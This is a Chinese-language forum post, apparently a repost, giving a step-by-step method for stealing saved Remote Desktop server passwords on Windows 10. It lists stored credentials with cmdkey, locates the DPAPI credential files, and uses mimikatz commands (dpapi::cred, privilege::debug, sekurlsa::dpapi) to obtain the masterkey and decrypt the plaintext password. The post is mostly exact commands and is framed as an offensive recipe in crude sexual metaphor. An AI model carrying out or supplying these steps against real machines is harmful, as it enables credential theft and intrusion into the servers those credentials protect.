測試環境:windows 10
道友們應該碰到過管理在本地保存遠程終端的憑據,憑據里躺着誘人的胴體(服務器密碼),早已讓我們的XX飢渴難耐了。
但是,胴體卻裹了一身道袍(加密),待老衲操起法器將其寬衣解帶。
0x01 憑據管理器中查看Windows憑據:
TERMSRV/1xx.xxx.xxx.xx2
可通過命令行獲取,執行: cmdkey /list
注意:該命令務必在Session會話下執行,system下執行無結果。
0x02 憑據存儲在用戶目錄下:
C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
圖中名為
"FF359429D6F19C64BA7D3E282558EEB5"的文件即為目標憑據:TERMSRV/1xx.xxx.xxx.xx2的存儲文件
0x03 執行:
mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5"
pbData是憑據的加密數據,guidMasterKey是憑據的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}。
0x04 執行:
mimikatz privilege::debug sekurlsa::dpapi
根據目標憑據GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其關聯的MasterKey,這個MasterKey就是加密憑據的密鑰,即解密pbData所必須的東西。
0x05 拿到了MasterKey,服務器密碼便唾手可得。執行解密命令:
mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"
解密出來的CredentialBlob即為憑據TERMSRV/1xx.xxx.xxx.xx2的服務器密碼。
文章來源於國內安全交流論壇土司\-_-\